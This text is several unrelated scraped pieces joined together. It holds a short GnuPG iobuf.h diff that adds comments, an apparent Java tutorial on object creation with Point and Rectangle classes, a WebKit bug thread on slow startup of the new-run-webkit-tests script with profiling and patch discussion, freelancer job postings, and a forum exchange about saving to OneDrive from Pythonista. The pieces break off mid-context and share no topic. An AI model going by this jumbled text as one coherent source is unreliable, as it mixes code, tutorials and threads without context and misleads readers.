#define iobuf_where(a) "[don't know]"
+
+/* Each time a filter is allocated (via iobuf_alloc()), a
+ monotonically increasing counter is incremented and this field is
+ set to the new value. This macro returns that number. */
#define iobuf_id(a) ((a)->no)
#define iobuf_get_temp_buffer(a) ( (a)->d.buf )
#define iobuf_get_temp_length(a) ( (a)->d.len )
-#define iobuf_is_temp(a) ( (a)->use == 3 )
+
+/* Whether the filter uses an in-memory buffer. */
+#define iobuf_is_temp(a) ( (a)->use == IOBUF_OUTPUT_TEMP )
#endif /*GNUPG_COMMON_IOBUF_H*/
The GNU Privacy Guard
RSS
Atom | https://git.gnupg.org/cgi-bin/gitweb.cgi?p=gnupg.git;a=blobdiff;f=common/iobuf.h;h=22e02daad740823ef461ca97fe29894f0c2bc404;hp=3a189c47ddd30096532925fe1b451f7f0b9eaf39;hb=6e23416fe61d4130918f2d1bf6e1f98d102c4610;hpb=b008274afdbe375b32a7e66dbd073e200f6f0587 | CC-MAIN-2019-22 | refinedweb | 4,107 | 73.98 |
As you know, a class provides the blueprint for objects; you create an object from a class. Each of the following statements taken from the
CreateObjectDemo program creates an object and assigns it to a variable:
Point originOne = new Point(23, 94); Rectangle rectOne = new Rectangle(originOne, 100, 200); Rectangle rectTwo = new Rectangle(50, 100);
The first line creates an object of the
Point class, and the second and third lines each create an object of the
Rectangle class.
Each of these statements has three parts (discussed in detail below):
Previously, you learned that to declare a variable, you write:
type name;
This notifies the compiler that you will use name to refer to data whose type is type. With a primitive variable, this declaration also reserves the proper amount of memory for the variable.
You can also declare a reference variable on its own line. For example:
Point originOne;
If you declare
originOne like this, its value will be undetermined until an object is actually created and assigned to it. Simply declaring a reference variable does not create an object. For that, you need to use the
new operator, as described in the next section. You must assign an object to
originOne before you use it in your code. Otherwise, you will get a compiler error.
A variable in this state, which currently references no object, can be illustrated as follows (the variable name,
originOne, plus a reference pointing to nothing):
The new operator instantiates a class by allocating memory for a new object and returning a reference to that memory. The new operator also invokes the object constructor.:
Point originOne = new Point(23, 94);
The reference returned by the new operator does not have to be assigned to a variable. It can also be used directly in an expression. For example:
int height = new Rectangle().height;
This statement will be discussed in the next section.
Here's the code for the Point class:
public class Point { public int x = 0; public int y = 0; //constructor public Point(int a, int b) { x = a; y = b; } }
This class contains a single constructor. You can recognize a constructor because its declaration uses the same name as the class and it has no return type. The constructor in the Point class takes two integer arguments, as declared by the code (int a, int b). The following statement provides 23 and 94 as values for those arguments:
Point originOne = new Point(23, 94);
The result of executing this statement can be illustrated in the next figure:
Here's the code for the Rectangle class, which contains four construct; } }
Each constructor lets you provide initial values for the rectangle's origin, width, and height,:
Rectangle rectOne = new Rectangle(originOne, 100, 200);
This calls one of
Rectangle's constructors that initializes
origin to
originOne. Also, the constructor sets
width to 100 and
height to 200. Now there are two references to the same Point objectan object can have multiple references to it, as shown in the next figure:
The following line of code calls the
Rectangle constructor that requires two integer arguments, which provide the initial values for width and height. If you inspect the code within the constructor, you will see that it creates a new Point object whose x and y values are initialized to 0:
Rectangle rectTwo = new Rectangle(50, 100);
The Rectangle constructor used in the following statement doesn't take any arguments, so it's called a no-argument constructor:
Rectangle rect = new Rectangle();. | http://docs.oracle.com/javase/tutorial/java/javaOO/objectcreation.html | CC-MAIN-2017-34 | refinedweb | 585 | 54.86 |
Implement extended support of precompile headers with gcc pls.
what I need:
- some option in project properties (like switch on/off)
- creation of makefiles (build precompile headers (.h .hpp ...) first then object files (.c .cpp ...))
Result:
- change in one header file leads to rebuild of depended .cpp files
This link may help to understand how it all works in gcc:
You have a plug-in for showing c++ headers dependencies - just may be helpful for realization.
Please evaluate
+1 vote (where's the vote button???).
Additionally, allow us to choose the PCH filename.
Also, have a look at how Borland (Embarcadero) implements their PCH.
(In reply to comment #2)
> +1 vote (where's the vote button???).
Ctrl-F and you can find "Priority: P2 with 3 votes (vote)" text
You can use the following workaround to get precompiled headers.
For GNU compiler:
Option #1 (precompiled headers will be created whenever you like):
1. Go to header's file you want to pre-compile properties (select Properties from it's context menu).
2. Go to Custom Build Step category and set Compile Line (like, gcc -c -g -Wall myheader.h) and Outputs (like, myheader.h.pch).
3. Go to the source file(s) compiler properties (Properties -> C Compiler or Properties -> C++ Compiler), the header file included into, and set Additional Dependencies field to precompiled header(s) file name (like, myheader.h.pch).
Option #2 (precompiled headers will be created in the build directory):
1. Go to header's file you want to precompile properties.
2. Go to General category and set Tool to either C Compiler or C++ Compiler.
3. Go to the source file(s) compiler properties (Properties -> C Compiler or Properties -> C++ Compiler), the header file included into, and set Additional Dependencies field to precompiled header(s) name prefixed by ${OBJECTDIR} (like, ${OBJECTDIR}/myheader.h.pch) and Include Directory to ${OBJECTDIR}.
For Oracle Solaris Studio compilers (see):
1. Go to the source file(s) properties.
2. Set Additional Options on C Compiler or C++ Compiler category to -xpch=auto.
For Qt projects ():
1. Go to Qt project properties.
2. Set PRECOMPILED_HEADER variable to list of headers you want to precompile in Custom Definitions field.
It would be nice to know if some of the above options doesn't work for you and why.
zachsaw and others,
Could you please share you ideas how you expected this to be implemented?
Or provided workarounds are quite suitable for you?
Regards,
Igor
I was looking for project level switch: use / not use. Because for quite big projects with more than 100 headers its annoying to change properties for around 200 files (100 header file and around 100 cpp files).
Pre-compile header naming is not important for me, I`m ok with "<original_header_name>.pch" pattern, like "my_header.h.pch".
The output is Makefile that builds project with pre-compiled headers. So I can commit it and later checkout on CI node and build sources with pre-compiled headers.
yurac, thanks a lot for reply!
Could you, please, answer some more questions to make your requirements more clear.
1. Do you using only GCC or some other compilers sets as well (like Solaris Studio)?
2. All sources from you project are written in the same language (compiled by the same compiler)? I'm asking that as you can't use a C precompiled header for a C++ compilation.
3. It's OK for you to place precompiled header files to the directory with headers or you expect them to be created in some other location?
4. Do you need to provide some additional compiler's options for headers compilation?
5. Are you expecting all .pch files to be removed then you are doing clean of the project or they should not be touched on cleaning?
Probably I'll have some more questions a little bit later.
Thanks in advance,
Igor
Hi Igor,
My thinking of precompiled header support is similar to Yurac's.
Particularly, of all the IDEs I've used, I like the implementation by Borland.
You have the option to either "Create and use" / "Do not use" / "Use PCH file" (this last one won't be possible for what I'm suggesting below).
The way they have done it is the precompiled header for the entire project ends up in one PCH file (it's huge but it's also used for code assist / completion). I suspect this is not possible with GCC, but it would be possible to create the same in a "pch" folder as individual files, just like how .o files are dumped into "bin".
Answers to your question to Yurac from my perspective:
1. Do you using only GCC or some other compilers sets as well (like Solaris
Studio)?
Only GCC.
2. All sources from you project are written in the same language (compiled by
the same compiler)? I'm asking that as you can't use a C precompiled header for
a C++ compilation.
Not at the moment but it is feasible that someone would have C and C++ in one project. Is this technically not possible?
3. It's OK for you to place precompiled header files to the directory with
headers or you expect them to be created in some other location?
Some other location -- preferably "pch\Debug" "pch\Release" folders under the same project root. PCH creation phase will generate plenty of files/subfolders within it but that's not a big deal -- they're all contained within the same "pch" folder.
4. Do you need to provide some additional compiler's options for headers
compilation?
No. But currently active compiler options should be used to create the pch's. If project compiler options change, all .pch files would need to be recreated.
5. Are you expecting all .pch files to be removed then you are doing clean of
the project or they should not be touched on cleaning?
Clean should remove .pch files. Keep in mind that a lot of source files refer to the same .h file, which is where pch comes in to reduce compilation time. So long as pch is generated prior to any build actions, total build time will be reduced (experience from other IDEs). In addition, we should only be doing clean minimally anyway.
Hello zachsaw,
Thanks for such a detailed answers to my questions.
Borland's (as I've seen it last time in C++Builder 6) as well as Microsoft VS's approaches uses the following
general idea: all includes you want to precompile should be somehow grouped together. Borland's approach uses
pragmas to separate headers, that should be precompiled, from ones that should not. In MSVS you should include
header to "special" header file, and in that case it will be precompiled. And this approach looks to be better when compiling
all the headers we have in project.
So It looks like the better way to have pre-compiled headers in you project is to create MSVS like "special" include file (one for
each compiler) and include all headers you want to precompile in it. And this "special" will be included into you sources
instead of these headers. After that you can make this file precompilable the way I've described in my comment above.
Such approach will provide you ability to use any compiler options you want while precompiling this header. And it also be
possible to separate headers that make sense to precompile from other ones.
Regards,
Igor
Apple Xcode has precompiled header implemented the same way as MSVC - one selected header pre-compiled into .pch file and then included into all other sources automatically.
Summing everything up here is steps how to use pre-compiled headers in NetBeans CND projects for GCC:
1. Create header file and include all headers you want to precompile into it. Note: this file is compiler specific. This means that all C-headers should be included into file which will be precompiled by C-compiler.
2. Replace includes in source files by include of this single header.
3. Set it Command Line to header compile line and Outputs to <headername>.h.gch. Note: it's better place the precompiled header at the same directory as original headers.
4. Add the following lines to .build-pre target in the Makefile (don't forget to replace <headername> by actual header name):
@echo Pre-compiling headers
@${MKDIR} -p ${CND_BUILDDIR}/${CONF}/${CND_PLATFORM_${CONF}}
@${MAKE} -f nbproject/Makefile-${CONF}.mk <headername>.h.gch
5. Clean and build project -> precompiled header will appear and will be used on next re-builds.
Here is an example how it works:
1. Create Quote sample.
2. Create precompiled.h in Header Files folder.
3. Add all includes into it:
#include <iostream>
#include <cstdlib>
#include <list>
#include <assert.h>
#include "cpu.h"
#include "customer.h"
#include "disk.h"
#include "memory.h"
#include "module.h"
#include "system.h"
4. All .cc files should include only precompiled.h.
5. Set Custom Build Step properties of precompiled.h:
Command Line: g++ -c -g -Wall -MMD -MP -MF ${OBJECTDIR}/precompiled.h.pch.d -o precompiled.h.gch precompiled.h
Outputs: precompiled.h.gch
6. Update Makefile (listed under Important Files):
.build-pre:
@echo Pre-compiling headers
@${MKDIR} -p ${CND_BUILDDIR}/${CONF}/${CND_PLATFORM_${CONF}}
@${MAKE} -f nbproject/Makefile-${CONF}.mk precompiled.h.gch
7. Clean and Build Quote -> precompiled.h.gch will appear near precompiled.h and will be used on next rebuilds. | https://netbeans.org/bugzilla/show_bug.cgi?id=153871 | CC-MAIN-2017-04 | refinedweb | 1,572 | 66.84 |
Design Patterns: Null Object
Well, let’s start from the beginning! Sir Tony Hoare is who created the null reference, in 1965. Unitl now, Null checks is completly a requirement when we develop something.
Normal Situation
It is usually that we very commom we see null checks, like this:
public void CreateClient(IClient client)
{
if (client == null) throw new NullReferenceException();
if (client.Name == null) throw new NullReferenceException(); // ... do something
}
But, what if you could guarantee that the object was never null?
For this, watch below:
Null Object Pattern
First, we need to define a default object:
public class NullClient : IClient
{
public int Id => 0; public string Name => "Non-client"; public int Age => 0;
}
Watch that our class inheritance of the IClient interface.
When we do it, we just make this verify:
static void Main(string[] args)
{
IClient client = new Client(); var clientService = new ClientService(); if (client == null)
client = new NullClient(); clientService.CreateClient(client);
}
And when we do the create method, we do not need to verify the object and the name, because we guarantee that the object never is null. | https://alexalvess.medium.com/design-patterns-null-object-a1ebb20dbf30 | CC-MAIN-2022-21 | refinedweb | 180 | 60.45 |
Testing with a stopwatch, on my system (2.4GHz Core2 Duo MacBook Pro), the time to the first visible evidence of a test being run is:
run-webkit-tests: 10s
new-run-webkit-tests: 75s
On the other hand, new-run-webkit tests is definitely faster at running through all the layout tests. Total real time (as tested by "time"):
run-webkit-tests: 13m13.386s
new-run-webkit-tests : 18m35.731s
So at the very least, new-run-webkit-tests is giving up a big chunk of its performance advantage to startup latency.
wow, that's slow. I wonder if there was something wrong with your configuration. Were all your files on a local filesystem? I've only ever seen that kind of slowness on a windows machine running on top of an SMB share.
It is true that new-run-webkit-tests is slower than run-webkit-tests for a couple of reasons. The first has to do with spawning off multiple threads, which obviously takes time. The second is that there is a certain amount of "all at once" processing that new-run-webkit-tests does to compute statistics at the start. I have been tempted to fix the latter but I've never seen that it's been a real problem.
Either way, your numbers are an order of magnitude slower than I would expect, so we should figure out what's going on. If you could post the log output from --verbose from the beginning to when testing started that would be a big help.
Seems like we could benefit from using Python's profiler to figure out what's taking the time.
I ran:
python -m cProfile new-run-webkit-tests
and aborted it about 2 minutes in (20% through the tests on my machine).
We spent a whopping 45 SECONDS in time.sleep:
3011 45.569 0.015 45.569 0.015 {time.sleep}
And 3 seconds making some 100k stat calls:
109687 3.603 0.000 3.603 0.000 {posix.stat}
50 seconds were spent reading files:
5441 50.576 0.009 50.576 0.009 {method 'read' of 'file' objects}
We're spending a lot of time reading image hashes up front.
TestInfo.__init__ does:
self.image_hash = open(expected_hash_file, "r").read()
(which probably leaks a file handle).
run-webkit-tests reads image hashes when it gets to them. We could to (and probably should). There shouldn't be a thread-safety issue because only one thread is ever processing any given test.
Created attachment 53662 [details]
Patch
With that patch I see the code sleeping for 5 seconds and reading for 10s.
268 5.258 0.020 5.258 0.020 {time.sleep}
15 9.412 0.627 9.412 0.627 {method 'read' of 'file' objects}
We're also spending 4s in stat, 1s listing directories and 1s calling "startswith":
109687 4.061 0.000 4.061 0.000 {posix.stat}
2842147 1.320 0.000 1.320 0.000 {method 'startswith' of 'str' objects}
1813 1.168 0.001 1.168 0.001 {posix.listdir}
Obviously still more work to do.
This will also get easier to debug once bug 37780 lands.
One thing that would make this latency much easier to deal with is if the meter updated more frequently during things like "Checking build ...". It seems that the part of the code which is updating the meter should be aware of the fact that we have to build DRT and build ImageDiff and possibly start helper processes. We may just want to pass a meter object to the port during check_build().
Created attachment 53667 [details]
Added small speedup to test gathering
Comment on attachment 53667 [details]
Added small speedup to test gathering
Nice!
Comment on attachment 53667 [details]
Added small speedup to test gathering
LGTM, apart from your removal of my beloved one-character variable names ;)
Comment on attachment 53667 [details]
Added small speedup to test gathering
Rejecting patch 53667 from commit-queue.
Failed to run "['WebKitTools/Scripts/test-webkitpy']" exit_code: 1
Last 500 characters of output:
e 533, in loadTestsFromName
module = __import__('.'.join(parts_copy))
File "/Users/eseidel/Projects/CommitQueue/WebKitTools/Scripts/webkitpy/layout_tests/run_webkit_tests_unittest.py", line 36, in <module>
import webkitpy.layout_tests.run_webkit_tests as run_webkit_tests
File "/Users/eseidel/Projects/CommitQueue/WebKitTools/Scripts/webkitpy/layout_tests/run_webkit_tests.py", line 130
with open(self._expected_hash_path, "r") as hash_file:
^
SyntaxError: invalid syntax
Full output:
weird ... is the commit queue bot running an unusual version of python?
Comment on attachment 53667 [details]
Added small speedup to test gathering
Btw, this patch doesn't comply with our new unicode overlords.
I wrote this patch on SL which has python 2.6. I suspect I need to fix it for 2.5.
Add:
from __future__ import with_statement
which fixed it.
I'll make our unicode overlords happy an re-post before I commit.
Landed as r57956. | https://bugs.webkit.org/show_bug.cgi?id=37643 | CC-MAIN-2017-17 | refinedweb | 813 | 66.64 |
On 04/08/2015 08:29 PM, Doug Ledford wrote:> On Tue, 2015-04-07 at 14:42 +0200, Michael Wang wrote:>> Add new callback query_transport() and implement for each HW.> > My response here is going to be a long email, but that's because it's> easier to respond to the various patches all in one response in order to> preserve context. So, while I'm responding to patch 1 of 17, my> response will cover all 17 patches in whole.Thanks for the review :-)> >> Mapping List:[snip]>>>> diff --git a/drivers/infiniband/core/device.c b/drivers/infiniband/core/device.c>> index 18c1ece..a9587c4 100644>> --- a/drivers/infiniband/core/device.c>> +++ b/drivers/infiniband/core/device.c>> @@ -76,6 +76,7 @@ static int ib_device_check_mandatory(struct ib_device *device)>> } mandatory_table[] = {>> IB_MANDATORY_FUNC(query_device),>> IB_MANDATORY_FUNC(query_port),>> + IB_MANDATORY_FUNC(query_transport),>> IB_MANDATORY_FUNC(query_pkey),>> IB_MANDATORY_FUNC(query_gid),>> IB_MANDATORY_FUNC(alloc_pd),> > I'm concerned about the performance implications of this. The size of> this patchset already points out just how many places in the code we> have to check for various aspects of the device transport in order to do> the right thing. Without going through the entire list to see how many> are on critical hot paths, I'm sure some of them are on at least> partially critical hot paths (like creation of new connections). I> would prefer to see this change be implemented via a device attribute,> not a functional call query. That adds a needless function call in> these paths.That's exactly the first issue come into my mind while working on this.Mostly I was influenced by the current device callback mechanism, we haveplenty of query callback and they are widely used in hot path, thus Ifinally decided to use query_transport() to utilize the existed mechanism.Actually I used to learn that the bitmask operation is somewhat expensivetoo, while the callback may only cost two register, one instruction andtwice jump, thus I guess we may need some benchmark to tell the differenceon performance, so I just pick the easier way as first step :-P> >> diff --git a/drivers/infiniband/core/verbs.c b/drivers/infiniband/core/verbs.c>> index f93eb8d..83370de 100644>> --- a/drivers/infiniband/core/verbs.c>> +++ b/drivers/infiniband/core/verbs.c>> @@ -133,14 +133,16 @@ enum rdma_link_layer rdma_port_get_link_layer(struct ib_device *device, u8 port_>> if (device->get_link_layer)>> return device->get_link_layer(device, port_num);>> >> - switch (rdma_node_get_transport(device->node_type)) {>> + switch (device->query_transport(device, port_num)) {>> case RDMA_TRANSPORT_IB:>> + case RDMA_TRANSPORT_IBOE:>> return IB_LINK_LAYER_INFINIBAND;> > If we are perserving ABI, then this looks wrong. Currently, IBOE> returnsi transport IB and link layer Ethernet. It should not return> link layer IB, it does not support IB link layer operations (such as MAD> access).That's my bad, IBOE is ETH link layer.> [snip]>> };> > I'm also concerned about this. I would like to see this enum> essentially turned into a bitmap. One that is constructed in such a way> that we can always get the specific test we need with only one compare> against the overall value. In order to do so, we need to break it down> into the essential elements that are part of each of the transports.> So, for instance, we can define the two link layers we have so far, plus> reserve one for OPA which we know is coming:The idea sounds interesting, but frankly speaking I'm already starting toworried about the size of this patch set...I really prefer to move optimizing/reforming work like this into next stage,after this pioneer patch set settle down and working stably, after all, wehave already get rid of the old transport helpers, reforming based onthat should be far more easier and clear.Next version will be reorganized to separate the implementation and wrapperreplacement, which make the patch set even bigger, fortunately, since the logicalis not very complex, we are still able to handle it, I really prefer we canfocus on performance and concise after infrastructure built up.> > RDMA_LINK_LAYER_IB = 0x00000001,> RDMA_LINK_LAYER_ETH = 0x00000002,> RDMA_LINK_LAYER_OPA = 0x00000004,> RDMA_LINK_LAYER_MASK = 0x0000000f,[snip]> > From patch 2/17:> > >> +static inline int rdma_ib_mgmt(struct ib_device *device, u8 port_num)>> +{>> + enum rdma_transport_type tp = device->query_transport(device,>> port_num);>> +>> + return (tp == RDMA_TRANSPORT_IB || tp == RDMA_TRANSPORT_IBOE);>> +}> > This looks wrong. IBOE doesn't have IB management. At least it doesn't> have subnet management.This helper actually could be erased at last :-) after Sean's suggestion on cmastuff, no where need this raw helper anymore, just cap_ib_cm(), cap_iw_cm()and cap_ib_mad() is enough.> > Actually, reading through the remainder of the patches, there is some> serious confusion taking place here. In later patches, you use this as> a surrogate for cap_cm, which implies you are talking about connection> management. This is very different than the rdma_dev_ib_mgmt() test> that I create above, which specifically refers to IB management tasks> unique to IB/OPA: MAD, SM, multicast.[snip]>> +static inline int cap_ib_mad(struct ib_device *device, u8 port_num)>> +{>> + return rdma_ib_mgmt(device, port_num);>> +}>> +> > Why add cap_ib_mad? It's nothing more than rdma_port_ib_fabric_mgmt> with a new name. Just use rdma_port_ib_fabric_mgmt() everywhere you> have cap_ib_mad.That will be excellent if we use more concise semantic to address therequirement, but I really want to make this as next stage since it soundslike not a small topic...At this stage I suggest we focus on:1. erase all the scene using old transport/link-layer helpers2. classify helpers for each management branch somewhat accurately3. make sure it's table and works well (most important!)So we can do further reforming based on that milestone in future ;-)> [snip]> > rdma_port_get_read_sge(dev, port)> {> if (rdma_transport_is_iwarp)> return 1;> return dev->port[port]->max_sge;> }> > Then, as Jason points out, if at some point in the future the kernel is> modified to support devices with assymetrical read/write SGE sizes, this> function can be modified to support those devices.This part is actually a big topic too... frankly speaking I prefer someexpert in that part to reform the stuff in future and give a good testing :-)> > Patch 10/17:> > As Sean pointed out, force_grh should be rdma_dev_is_iboe(). The cm> handles iw devices, but you notice all of the functions you modify here> start with ib_. The iwarp connections are funneled through iw_ specific> function variants, and so even though the cm handles iwarp, ib, and roce> devices, you never see anything other than ib/iboe (and opa in the> future) get to the ib_ variants of the functions. So, they wrote the> original tests as tests against the link layer being ethernet and used> that to differentiate between ib and iboe devices. It works, but can> confuse people. So, everyplace that has !rdma_transport_ib should> really be rdma_dev_is_iboe instead. If we ever merge the iw_ and ib_> functions in the future, having this right will help avoid problems.Exactly, we noticed that the name transport do confusing peoples, nextversion will use rdma_tech_iboe() to distinguish from transport stuff,I guess that will make thing more clear :-)> > Patch 11/17:> > I wouldn't reform the link_layer_show except to make it compile with the> new defines I used above. This is try to erase the old transport/link-layer helpers, so we could havea clean stage for further reforming ;-)> [snip]> > OK.> > Patch 17/17:> > I would drop this patch. In the future, the mlx5 driver will support> both Ethernet and IB like mlx4 does, and we would just need to pull this> code back to core instead of only in mlx4.Actually we don't need that helper anymore, mlx4 can directly using it's ownimplemented get_link_layer(), I just leave it there as a remind.It doesn't make sense to put it in core level if only mlx4/5 using it, mlx5would have it's own get_link_layer() implementation too if it's going to supportETH port, they just need to use that new one :-)Regards,Michael Wang> > | https://lkml.org/lkml/2015/4/9/321 | CC-MAIN-2022-27 | refinedweb | 1,287 | 51.28 |
Php error fixer jobs
..
...some bugs, most of them on the frontend, and some features that need implemented. For example
Hello We have a word press site and we keep unwanted site reg for a while now It could be a plugin or one of our forms is not secure We have no idea ...we need to st...this sort "New user registration on your site : Username: lmcrowell1970 Email: xxxxx" Please help! We are sure it can be fixed in 5 min ! $10-$15 and a top grade to the fixer
..,...
I'm looking for a laravel developer, who should be able to fix laravel website errors. I'm expecting all errors should be fixed in 2 days.
Looking for a long-term developer to fix small regular crashes in an Android chat app using crash logs. Access to Crashlytics can be granted. Experience in Git is preferred.
Looking for a long-term developer to fix small regular crashes using crash logs. Access to Crashlytics can be granted. Experience in Git is preferred..
We are building a home, and have picked out many colors, finishes, cabinets and materials. We want to see how they will wor...and materials. We want to see how they will work. I have architectural drawings and examples of the materials we want to use. We are looking for something you might see on Fixer Upper when Joanna sits down with the clients.
I Need tester and bug fixer We have a android app that needs payment gateway fixed .
I have some bugs to fix up on asp.net and server connection You must have GOOD SKILLED and come to my computer (team viewer or anydesk) and fix few issues if you can Thanks to fix site and shopping cart with info on what cc to use,etc.
..
...SSL certificate on. As you will note there are various SSL mixed content errors being reported. I installed the plugin SSL Insecure Content Fixer and that still wouldn't fix the problem. I have disabled it. I'd like to employ someone to fix all the https conflict by changing the http: references. I DO NOT want someone
Need a map fixer for website which gives log and lat.
...applications entered by drivers for employment. The problem i need to be fixed is it does not send the email notification to the owner when a form was submitted. the files are php. on godaddy Linux server. Also, need a separate quote for job to create code to have the form saved if the form can not be completed at that time ? {large form} (a save
...to develop some software for me. I would like this
I am looking to create short viral videos similar...and is looking to grow with my company on an ongoing basis. The individual needs to be able to take on responsibility in timely delivery, think outside the box, be a "problem fixer", be a "solution finder", be a researcher and be creative. Please provide a link to your portfolio of similar work. had a website created in Wordpress for me and put on my miniature server prior to getting my static ipaddress established and working. Now that my domain is finally pointing to my server only Wordpress login page shows up and not the files and site that was created. I have all files and database on the computer but not sure how to make it all work.
beep beep click click ding - crontab fixer
I am looking for an illustrator to sketch carts (from eng...) and should take up to 2-3 hours max..
...with my website since I have the SSL certificate. I am using hostgator. I use cloudflare to speed up the website and the flexible SSL certificate. I use SSL Insecure Content Fixer plugin to force the SSL on the website but it messes up my website ( I used Really simple SSL before but it was worse). I am experiencing that the server tries to redirect too
...Team: Anton - Director/CEO Tom - Master Mechanic Maris - Engine Specialist Armandito - NCT Prepares Corlito - Engine | Electronic Ervin - Engine Specialist Gena - Master Fixer Dimatrol - Body Repairs (Can you please add to each name from above some general self descriptions to fit their specs and expertise areas) 3) Services: Car Body works
Looking for Magento bug fixer to fixe an issue on mails in magento, the clients don't receive the orders emails anymore, (Cron already set).
Bonjour, Je recherche un développeur pour fixer un bug qui est dû au http2 de Cloudflare. Cela est assez embêtant car les utilisateurs de Safari ne peuvent pas se connecter au site. L'erreur en question d'après les tests de Cloudflare : * http2 error: Invalid HTTP header field was received: frame type: 1, stream: 1, name: [upgrade], value: ...
For a website that is already online we're looking for a bug fixer. If you can deliver good work it can be long therm relationship.
Hello, Please bid under my budget we have frequent projects, for selected freelancer. This needs to be done under 1 hour. Happy Bidding
...Startup manager 5. Uninstall manager 6. File Splitter & Joiner(*) 7. Password Recovery(*) 8. System Optimizer 9. Optimize Internet(*) 10. Tweak Memory(*) 11. Shortcut Fixer(*) 12. Repair Wizard(*) 13. Registry Backup 14. System Restore Point 15. Browser Tools 16. Disk Analyzer 17. Drive Wiper 18. Cookies Management 19. Winsock2 Repair (*)
I need my website re-configured. Website templates fixer
Please Sign Up or Login to see details.
I am trying to alert a returned value from a function and i get this in the alert [object Object] here is the javascript code
I need someone to fix the background of some of my photos. See the attached picture. I only want the white sheet with lights as the background. No ceiling or floor to be seen. I have more like this. If you think you can do this, show me a sample.
...$data); if (strlen($rate_info[1]) > 0 && floatval($rate_info[1]) > 0.00) { return (float)$rate_info[1]; } } } return false; } /** * Call to the Fixer Foreign exchange rates and currency conversion API. * Retrieve the conversion rate between base currency and symbol currency. * * @return mixed false in case of errors
Fixer dependencies and install, prepair manual instalation of source
...character, line of code etc). It was working fine a month
retiree/bought a fixer upper two bed rm home want to add a third room size of room is 18x14 raised floor concert footing /only two walls and a roof
I need a production fixer with basic skills to help out during our filming in London for 2 days starting 3rd November. Basic skills, I just need a local to be available during filming.
I need my website re-configured built on wordpress , need someone with ssl content fixer experience and also resizing products images on ecommerce.!
I would require the creation of an improved, better style version of the following desig...
Seeking Sales Assistant and Closer Hello, I am seeking an experienced Tele Caller who can call our potential clients and possibly set appointments or convert to a sale. You should also be able to convince them to join our fashion event over the phone and/or through multiple email followups. List of Tasks: - Call potential clients and take registrations online or set meetings. - Send ...!
Looking for a local fixer / film production manager based in Nagasaki, who can help handle accommodation / transportation / meals / translation for a production team of less than 10 people. Commitment will likely be 2-8 days in Nagasaki.
installing warehouses rack 9-6pm $ 80
We have developed a new type of project management application. We have a development team spread ar...we often add people in to our development team who started with us as bug-fixers. It's a great way to learn our app and prove your skills. If you turn out to be a good bug fixer, we will want you to work with us on longer term development projects.
I own a business that rehabs houses kind of like a fixer upper TV show. I would like to write a how-to book on flipping houses. | https://www.freelancer.com/job-search/php-error-fixer/ | CC-MAIN-2018-39 | refinedweb | 1,361 | 75.2 |
10 Technical guidelines¶
This section contains some more in-depth technical guidelines for Fusion API for Python, not strictly necessary for basic use of MOSEK. maximum number of structural nonzeros in any single expression object is \(2^{31}-1\).
The total size of an item (the product of dimensions) is limited to \(2^{63}-1\).
10.2 Memory management and garbage collection¶
Users who experience memory leaks using Fusion, especially:
memory usage not decreasing after the solver terminates,
memory usage increasing when solving a sequence of problems,
should make sure that the
Model objects are properly garbage collected. Since each
Model
Model object is disposed of manually when it is not used any more. The necessary cleanup is performed by the method
Model.dispose.
The
Model supports the Context Manager protocol, so it will be destroyed properly when used in the construction:
with Model() as M: # Work with the model here pass;
One can also write
try: M = Model() # Work with the model here finally: M): def __init__(self): finished = False try: Model.__init__(self) # other initialization finished = True finally: if not finished: self.dispose()
10.3.
The
Model object’s, variables’ and constraints’ constructors provide versions with a string name as an optional parameter.
Names introduced in Fusion are transformed into names in the underlying low-level optimization task, which in turn can be saved to a file. In particular:
a scalar variable with name
varbecomes a variable with name
var[],
a one- or more-dimensional variable with name
varbecomes a sequence of scalar variables with names
var[0],
var[1], etc. or
var[0][0],
var[0][1], etc., depending on the shape,
the same applies to constraints,
for a conic constraint with name
cona sequence of slack variables with names
con[0].coneslack, etc. or
con[0][0].coneslack, etc., depending on the shape of the constraint, is added.
a new variable with name
1.0may be added.
These are the guidelines. No guarantees are made for the exact form of this transformation.
Note that file formats impose various restrictions on names, so not all resulting names can be written verbatim to each type of file, and when writing to a file further transformations and character substitutions can be applied, resulting in poor readability. This is particularly true for LP files, so saving Fusion problems in LP format is discouraged. The OPF format is recommended instead. See Sec. 15 (Supported File Formats).
10
numThreads.
For conic problems (when the conic optimizer is used) the value set at the first optimization will remain fixed through the lifetime of the process. The thread pool will be reserved once for all and subsequent changes to
numThreads will have no effect. The only possibility at that point is to switch between multi-threaded and single-threaded interior-point optimization using the parameter
intpntMultiThread.
The parameter
numThreads affects only the optimizer. It may be the case that
numpy is consuming more threads. In most cases this can be limited by setting the environment variable
MKL_NUM_THREADS. See the
numpy documentation for more details.
10.5 Efficiency¶
In some cases Fusion must reformulate the problem by adding auxiliary variables and constraints before it can be represented in the optimizer’s internal format. This can cause an
ee = Expr.constTerm(k, 0.) for i in range(n): ee = Expr.add( ee, Expr.mul(A[i],x[i]) )
A better way is to store the intermediate expressions for \(A_i x_i\) and sum all of them in one step:
ee = Expr.add( [ Expr.mul(AA,xx) for (AA,xx) in zip(A,x)] )
Fusion design naturally promotes this sort of vectorized implementations. See Sec. 6.8 (Vectorization) for more examples.
Parametrize relevant parts of the model
If you intend to reoptimize the same model with changing input data, use a parametrized model and modify it between optimizations by resetting parameter values, see Sec. 6.6 (Parameters). This way the model is constructed only once, and only a few coefficients need to be recomputed each time.
Keep a healthy balance and parametrize only the part of the model you in fact intend to change. For example, using parameters in place of all constants appearing in the model would be an overkill with an adverse effect on efficiency since all coefficients in the problem would still have to be recomputed each time..
10.
10.7 Deployment¶
When redistributing a Python application using the MOSEK Fusion API for Python 9.3.20, the following libraries must be included:
Furthermore, one (or both) of the directories
python/2/mosekfor Python 2.x applications,
python/3/mosekfor Python 3.x applications.
must be included.
By default the MOSEK Python API will look for the binary libraries in the MOSEK module directory, i.e. the directory containing
__init__.py. Alternatively, if the binary libraries reside in another directory, the application can pre-load the
mosekxx library from another location before
mosek is imported, e.g. like this
import ctypes ; ctypes.CDLL('my/path/to/mosekxx.dll') | https://docs.mosek.com/latest/pythonfusion/guidelines-fusion.html | CC-MAIN-2022-27 | refinedweb | 833 | 55.34 |
File sharing and storage to OneDrive
I used to be able to save to OneDrive prior to the release of v2. Is this by design? or did the upgrade trigger something? (do love the new version anyway.
- Webmaster4o
Save to OneDrive how? Through the share sheet? Programmatically? What changed? Sorry, I need more information about how you used to save to OneDrive in versions past.
If it was through the share sheet, I cannot say why it does not work anymore (does it work else where?)
If it was through the share sheet another alternative would be to use the python SDK provided by Microsoft
